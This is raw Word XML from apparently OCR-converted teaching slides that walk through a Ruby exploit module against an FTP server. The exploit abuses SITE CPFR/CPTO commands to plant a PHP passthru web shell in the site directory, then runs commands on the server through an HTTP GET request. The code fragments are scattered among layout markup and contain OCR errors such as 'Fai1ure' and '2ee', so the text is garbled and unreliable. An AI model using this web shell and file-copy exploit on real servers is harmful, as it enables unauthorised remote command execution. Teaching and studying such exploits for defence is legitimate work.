                          <a:blip r:embed="rId1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250" cy="133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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289ED06B" wp14:editId="6FAE5749">
                  <wp:extent cx="76200" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202176" name="Picture 20217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2176" name="Picture 202176"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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00" cy="171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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E577120" wp14:editId="4B9B97CA">
                  <wp:extent cx="76200" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202177" name="Picture 20217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2177" name="Picture 202177"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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00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>' ] ) ;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1AFEF2" wp14:editId="45B3463B">
                  <wp:extent cx="781050" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202226" name="Picture 20222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2226" name="Picture 202226"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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81050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331BF21" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>- Failure copying to temporary file")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6436F369" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1434"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
            <w:vMerge w:val="restart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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22C8C1D4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="2377"/>
              <w:ind w:left="315"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="70"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC09425" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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</w:tcPr>
          <w:p w14:paraId="190016C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="337680C6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4170C4F7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2826"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B24E7ED" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9390" w:type="dxa"/>
            <w:vMerge w:val="restar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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41E22E56" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="810"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put("SITE CPFR </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">'TMPPATH' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">.&lt;?php res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D187EC6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="439" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="1079"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('350' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099A27BE" wp14:editId="79F3637C">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202329" name="Picture 20232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2329" name="Picture 202329"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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5900" cy="171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40"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC42A20" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="28" w:line="217" w:lineRule="auto"/>
              <w:ind w:left="810" w:right="254"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put("SITE CPTO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>'SITEPATH'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093C867C" wp14:editId="71FFEF07">
                  <wp:extent cx="57150" cy="123825"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202338" name="Picture 20233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2338" name="Picture 202338"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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150" cy="123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38"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3390F04F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="153" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1125" w:right="104" w:hanging="330"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('250' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0281D14A" wp14:editId="4946AD2B">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202331" name="Picture 20233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2331" name="Picture 202331"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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5900" cy="171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A5FC2A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="810" w:right="6764" w:hanging="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>end sock . close</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="26BAF368" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4020"/>
                <w:tab w:val="center" w:pos="4185"/>
                <w:tab w:val="center" w:pos="5325"/>
              </w:tabs>
              <w:spacing w:after="386"/>
              <w:ind w:left="-180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">passthru($_GET[\ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376E27AF" wp14:editId="17F545FC">
                  <wp:extent cx="828675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202400" name="Picture 20240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2400" name="Picture 202400"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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28675" cy="171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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378A8D1E" wp14:editId="5954970E">
                  <wp:extent cx="95250" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202337" name="Picture 20233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2337" name="Picture 202337"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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250" cy="133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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D33E827" wp14:editId="6B5DE181">
                  <wp:extent cx="76200" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202336" name="Picture 20233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2336" name="Picture 202336"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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00" cy="171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38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA0FAB1" wp14:editId="39BE1046">
                  <wp:extent cx="76200" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202335" name="Picture 20233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2335" name="Picture 202335"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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00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38"/>
              </w:rPr>
              <w:t>' ] ) ;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B831B34" wp14:editId="7FB7888E">
                  <wp:extent cx="781050" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202399" name="Picture 20239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2399" name="Picture 202399"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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81050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D18B0D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="100"/>
              <w:ind w:hanging="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Failure copying from temporary file")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67456D64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="796"/>
              <w:ind w:left="-1185"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFEBAA7" wp14:editId="4D4B774D">
                  <wp:extent cx="2171700" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340799" name="Picture 34079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0799" name="Picture 340799"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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71700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D827935" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>Failure copying PHP payload to website path, directory not writable?")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="68817946" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2646"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E4101FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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</w:tcPr>
          <w:p w14:paraId="3EF5FA9C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D9C193F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A166824" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This code puts PHP code following the /tmp directory on the command-line!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632CAE9F" wp14:editId="4433E7F2">
            <wp:extent cx="523875" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340791" name="Picture 34079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791" name="Picture 340791"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="523875" cy="150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614A1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="18330"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="1656151E" wp14:editId="7F74F071">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340801" name="Picture 34080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801" name="Picture 340801"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76723F60" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="18330"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4439295E" wp14:editId="5FF4E0F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>571500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6286500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340803" name="Picture 34080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803" name="Picture 340803"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12192000" cy="6286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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F62C61" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finally executing commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A114B4C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5067AAE4" wp14:editId="3413BF07">
                <wp:extent cx="10515600" cy="104775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="340808" name="Group 34080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515600" cy="104775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10515600" cy="104775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340807" name="Shape 340807"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10515600" cy="1047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515600" h="104775">
                                <a:moveTo>
                                  <a:pt x="0" y="52388"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10515600" y="52388"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="104775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340808" style="width:828pt;height:8.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="105156,1047">
                <v:shape id="Shape 340807" style="position:absolute;width:105156;height:1047;left:0;top:0;" coordsize="10515600,104775" path="m0,52388l10515600,52388">
                  <v:stroke weight="8.25pt" endcap="flat" joinstyle="miter" miterlimit="1" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16584" w:type="dxa"/>
        <w:tblInd w:w="315" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="95" w:type="dxa"/>
          <w:left w:w="135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16584"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="7CC3686B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4854"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64827614" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>print_ status (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74942CFB" wp14:editId="738E9749">
                  <wp:extent cx="847725" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216011" name="Picture 21601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6011" name="Picture 216011"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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7725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40"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Executing PHP payload #{target_uri . </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404EC055" wp14:editId="28355D9D">
                  <wp:extent cx="2409825" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216012" name="Picture 21601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6012" name="Picture 216012"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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09825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40"/>
              </w:rPr>
              <w:t>res = send_request_cgi ! (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF8C470" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="31" w:line="296" w:lineRule="auto"/>
              <w:ind w:left="1125" w:right="5979"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">'uri' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>normalize_uri(target_uri . path, payload_name), ' method '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>'GET',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11950177" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1928"/>
                <w:tab w:val="center" w:pos="4298"/>
                <w:tab w:val="center" w:pos="8228"/>
              </w:tabs>
              <w:spacing w:after="468"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>'vars_get '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">{ get_arg </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">"nohup </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2255169F" wp14:editId="35518949">
                  <wp:extent cx="1057275" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216013" name="Picture 21601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6013" name="Picture 216013"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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7275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42"/>
              </w:rPr>
              <w:t>encoded} &amp;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C65E09D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1065" w:right="1614" w:hanging="360"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res . code 2ee fail_with (Failure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="140C7FDA" wp14:editId="3E9188DD">
                  <wp:extent cx="2314575" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216014" name="Picture 21601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6014" name="Picture 216014"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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14575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42"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failure executing payload")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B66AB39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="15099" w:firstLine="705"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="703C68BD" wp14:editId="588B0E6C">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>9677400</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>228600</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1219200" cy="628650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="216091" name="Picture 21609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6091" name="Picture 216091"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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9200" cy="628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sz w:val="36"/>
              </w:rPr>
              <w:t>end end end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F89D258" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="69B5377F" wp14:editId="681F0369">
